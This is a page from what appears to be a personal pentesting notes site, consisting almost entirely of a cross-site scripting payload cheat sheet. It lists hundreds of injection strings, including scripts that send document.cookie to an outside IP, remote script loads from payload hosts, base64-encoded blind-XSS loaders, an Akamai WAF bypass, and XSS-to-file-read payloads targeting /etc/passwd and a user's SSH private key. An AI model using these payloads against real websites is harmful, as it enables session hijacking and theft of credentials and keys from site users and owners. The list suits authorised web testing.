AKUMA
  • README 🥷🏽
  • Red Teaming 👹
    • Loading 50% 😒
  • 👿BLUE TEAM
    • YARA rules
  • 📦Containers
    • DOCKER
      • Docker Security & Pentesting
        • Commond Docker error
      • 8 Best Practices for Docker Host Security
  • Windows Hardening 🛡️
    • Windows Active Directory Pentesting
      • Dll Hijacking
      • MSDT - Microsoft Support Diagnostic Tool Vulnerability
      • AD Enumeration TOOL
      • AD Certificate Templates
      • Kerberos Delegation
    • Windows Security Controls
      • Applocker Basics
    • Powershell Cheat sheet
    • AMSI Bypass
  • Linux Hardening 🛡️
    • Page 1
  • Network Services Pentesting
    • Footprinting Cheat sheet
      • 21-FTP
      • 161-SNMP
      • 445-SMB-139
      • 2049-NFS
      • 53-DNS
      • 587-SMTP
      • 143-IMAP/POP3
    • Juicy Curl
  • Pentesting Web
    • 100 Web Vulnerabilities, categorized into various types
    • Deserialization
      • Node.js Deserialization
    • SHODAN DORK
    • Vulnerabilities PAYLOADS
      • Directory Traversal Payload
      • Html-Injection-Read-FIle
      • Html-Injection
      • OS-Command-Injection
      • SQL-Injection-Auth-Bypass
      • PHP-Code-Injection
      • SQL-Injection
      • SSRF Basic
      • SSRF
      • XML-External-Entity
      • XSLT (eXtensible Stylesheet Language Transformations)
      • XSS Cheat Sheet
        • XSS
        • XSS -
        • XSS-polyglots
        • Cloudflare's XSS protection
    • Base Information
      • File-Extension-Inclusion
        • File-Inclusion-Windows
        • File-Inclusion-Linux
        • File-Extension
      • Media-Type-(MIME)
      • Windows-Sensitive-Files
      • Linux-Sensitive-Files
      • Linux-Log-Files
  • Blogs
    • How I Passed HTB Certified Penetration Testing Specialist
    • A comparative analysis of Open Source Web Application vulnerability scanners (Rana Khalil)
    • Sean Metcalfe Path for AD
    • Secure Docker - HackerSploit
  • Projects
    • HOME LAB
      • HOME LAB Blogs | Active Directory
        • Active Directory Lab Setup - 101
        • Active Directory Lab Setup - 102
        • Active Directory Lab Setup [ AD Enumeration ] - 103
        • Active Directory Lab Setup [AD Attacks ] - 104
      • Home Lab | Splunk Setup & Configuration
    • HOSTING A WEBSITE AND HARDENING ITS SECURITY
  • CTF- Writeups/ Solutions
    • HTB - Advanced Labs
      • Fortress
        • Jet
        • Akerva
        • Context
        • Synacktv
        • Faraday
        • AWS
      • Endgames
        • Ascension
        • RPG
        • Hades
        • Xen
        • P.O.O.
    • idekCTF 2024 🚩
    • TFC CTF 2024 🏳
    • DeadSec CTF 2024 🏴
      • Bing2 (web)
      • Mic_check (misc)
      • Windows Server (OSINT)
    • ImaginaryCTF 2024 🚩
      • cartesian-1 [Forensics]
      • packed [FORENSICS]
      • bom [FORENSICS]
      • BANK [MISC]
    • NahamCon CTF 2024 🏳
      • all WARMUPs
      • Base3200
      • The Hacker Webstore
      • iDoor
      • All About Robots
      • Thomas DEVerson
      • Helpful Desk
      • Curly Fries
    • Cyber Apocalypse 2024: Hacker Royale 🏴
      • Unbreakable [MISC]
      • StopDropAndRoll [MISC]
      • Character [MISC]
      • Delulu [pwn]
      • Tutorial [pwn]
      • Maze [Hardware]
      • TimeKORP [web]
  • Tools
    • Content Discovery & Form Manipulation
      • ffuf
      • RustScan
      • Feroxbuster
      • Dirsearch
      • Gobuster
      • Wfuzz
      • Webshell
      • websocket
Powered by GitBook
On this page
  • XSS list for manual testing (main cases, high success rate).
  • xss to lfi payload -
  1. Pentesting Web
  2. Vulnerabilities PAYLOADS
  3. XSS Cheat Sheet

XSS

<script>alert(1)</script>
<Script>alert(1)</Script>
<sCript>alert(document.domain)</sCript>
<script>alert(123);</script>
<script>alert("test");</script>
<script>alert(document.cookie)</script>
</script><script>alert(document.cookie)</script>
javascript:alert(document.cookie)
javascript:prompt(document.cookie)
'-alert(document.cookie)-'
</script><svg onload=alert(document.cookie)>
"onmouseover=alert(document.cookie)//
{{$on.constructor('alert(1)')()}}
<Script>alert(document.cookie)</Script>
<sCript>alert(document.domain)</sCript>
<script>alert(document.cookie);</script>
<script>alert(document.cookie);</script>
<script>alert(document.domain)</script>
<script>alert(document.cookie)</script>
<script>new Image().src="http://192.168.1.6/?c="+document.cookie;</script>
<script>var i=new Image; i.src="http://192.168.1.6/?"+document.cookie;</script>
</script><script>alert(1)</script>
<img src="abc" onerror="alert(1)">
<img src="" onerror="alert(document.cookie)">
<img src='x' onerror='alert(document.cookie)' />
&lt;img src=0 onerror=alert(&#39;1&#39;)&gt;
&lt;img src=0 onerror=alert(document.cookie)&gt;
<svg/onload=alert(1)>
"><svg onload=alert(1)>
';alert('1');'
';alert('abc');'
<sc<script>ript>alert(1)</sc</script>ript>
<BODY ONLOAD=alert('1')>
<marquee onstart=alert(1)></marquee>
<audio src/onerror=alert(1)>
<audio src/onerror=prompt(123)>
<audio src/onerror=confirm(123)>
<script src="http://192.168.1.6/test.js" ></script>
<body onload=alert(123) >
<body onload=confirm(123) >
<body onload=prompt(123) >
--><svg/onload=alert(document.domain)>
--><body onload=alert(123) >
--><script>alert(1)</script>
--><img src=x onerror=alert(Gotcha)>
<iframe src='https://testforiframe.site/'>
"><iframe src='https://testforiframe.site/'>
"><script src="https://ee.xss.ht/"></script>
"><script>alert(document.domain)</script>
"><script>alert(document.domain + '\n' + "1")</script>
"><script>alert(document.domain + '\n' + "Name")</script>
"<img src='x' onerror='alert(10)' />"
https://brutelogic.com.br/poc.svg
http://xss.rocks/scriptlet.html
javascript:alert(document.cookie)
poc.svg = <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
"><script>alert(1)</script>
'or<script>alert(1)</script>
'or<img src=0 onerror=alert('1')>
<script <script>>alert('Gotcha')</script>
<audio src/onerror=alert('Gotcha')>
<iframe src=javascript:alert('Gotcha')>
<iframe src="javascript:alert(Gotcha)">
<img src=x onerror=alert(Gotcha)>
';alert(gotcha); //
<body onmouseover="print()">
<body onclick=print()>
<body onmessage=print()>
<iframe onload=print()></iframe>
<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG """><SCRIPT>alert(document.cookie)</SCRIPT>"\>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
<<SCRIPT>alert(document.cookie);//\<</SCRIPT>>
<iframe src=http://xss.rocks/scriptlet.html <
</script><script>alert(document.cookie);</script>
</TITLE><SCRIPT>alert(document.cookie);</SCRIPT>
<BODY ONLOAD=alert(document.cookie)>
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<OBJECT TYPE="text/x-scriptlet" DATA="http://xss.rocks/scriptlet.html"></OBJECT>
<script>'-alert(1)-'</script>
'-alert(1)-'
></select><img%20src=1%20onerror=alert(1)>
{{$on.constructor('alert(1)')()}}
\"-alert(1)}//
<img src=1 onerror=print()>
"-top['al\x65rt']('sailay')-"
<pre id=p style=background:#000><svg onload='setInterval(n=>{for(o=t++,i=476;i--;o+=i%30?("0o"[c=0|(h=v=>(M=Math).hypot(i/30-8+3*M.sin(t/8/v),i%30/2-7+4*M.cos(t/9/v)))(7)*h(9)*h(6)/32]||".").fontcolor(c>2):"\n");p.innerHTML=o},t=1)'>
<img src="" onerror="innerHTML=decodeURIComponent.call`${location.hash}`" "="">
<img src="" onerror="location=/javascript:/.source+location" "="">
<img src="" onerror="window.onerror=alert;throw 1337" "="">
<img src="" onerror="alert&1par;1337&rpar;" "="">
<img src="" onerror="alert`1337`" "="">
javascript:alert(document.cookie)
"><img src=x onerror=alert(document.domain)>
"><script>alert(1)</script>
"><script>alert(document.domain)</script>
"><script>alert(document.cookie)</script>
"><script>prompt(1)</script>
"><script>prompt(document.domain)</script>
"><script>prompt(document.cookie)</script>
"><svg><script>alert(1)</script>
?s="onerror="innerHTML=decodeURIComponet.call`${location.hash}`"#<img src onerror=alert(1337)>
?s="onerror="location=/javascript:/.source%2Blocation"&a=%0A+alert(1337)
?s="onerror="window.onerror=alert;throw 1337"
?s="onerror="alert%261par;1337%26rpar;"
?s="onerror="alert`1337`"
<img src="xxx" onerror="document.write('\<iframe src=file:///etc/passwd>\</iframe>')"/>
<link rel=attachment href="file:///etc/passwd">
<iframe src="http://attacker-ip/test.php?file=/etc/passwd">\</iframe>
<IMG sRC=X onerror=jaVaScRipT:alert`xss`>
%22%3E%3CIMG%20sRC=X%20onerror=jaVaScRipT:alert`xss`%3E
<svg  xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)"/>
<svg><style> <script>alert(1)</script> </style></svg>
<math><style> <img src onerror=alert(2)> </style></math>

XSS list for manual testing (main cases, high success rate).

"><img src onerror=alert(1)>
"autofocus onfocus=alert(1)//
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//
javascript:alert(1)

Try it on:

  • URL query, fragment & path;

  • all input fields.

A nice way to store the payload

"><script>eval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))</script>

A payload to bypass Akamai WAF

<A href="javascrip%09t&colon;eval.apply${[jj.className+(23)]}" id=jj class=alert>Click Here

Another one

"><img/src/style=html:url("data:,"><svg/onload=confirm(69)>")>

BlindXSS-Payloads: #Max Payload 5-7

  - '"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3Jgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vamVycnkuYnhzm9keS5hcHBlbmRDaGlsZChhKTs=&#61 onerror=eval(atob(this.id))>'
  - "'><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS57ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs=&#61 onerror=eval(atob(this.id))>"

xss to lfi payload -

  1. x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open(‘GET’,’file:///etc/hosts’);x.send();

  2. x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open(‘GET’,’file:///etc/passwd’);x.send();

  3. get ssh private key -x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///home/reader/.ssh/id_rsa");x.send();

[Pinging the server down]

<script>
    let time = 500;
    setInterval(()=>{
        let img = document.createElement("img");
        img.src = https://attacker.com/ping?time=${time}ms;
        time += 500;
    }, 500);
</script>
<img src="https://attacker.com/delay">
PreviousXSS Cheat SheetNextXSS -

Last updated 9 months ago